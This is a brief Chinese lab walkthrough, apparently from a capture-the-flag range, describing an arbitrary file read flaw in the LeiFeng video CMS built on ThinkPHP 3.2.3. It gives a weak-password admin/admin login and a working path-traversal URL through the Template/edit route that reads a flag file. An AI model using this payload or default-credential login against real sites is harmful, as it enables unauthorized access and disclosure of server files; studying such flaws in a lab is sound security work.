简介
雷风影视CMS是一款采用PHP基于THINKPHP3.2.3框架开发,适合各类视频、影视网站的影视内容管理程序,该CMS存在缺陷,可以通过 admin.php?s=/Template/edit/path/*web*..*..*..*..*1.txt 的方式读取任意文件。
正文
1.进入靶场
2./admin.php进入后台
3.弱口令admin/admin登录
4.漏洞利用
/admin.php?s=/Template/edit/path/*web*..*..*..*..*..*..*flag
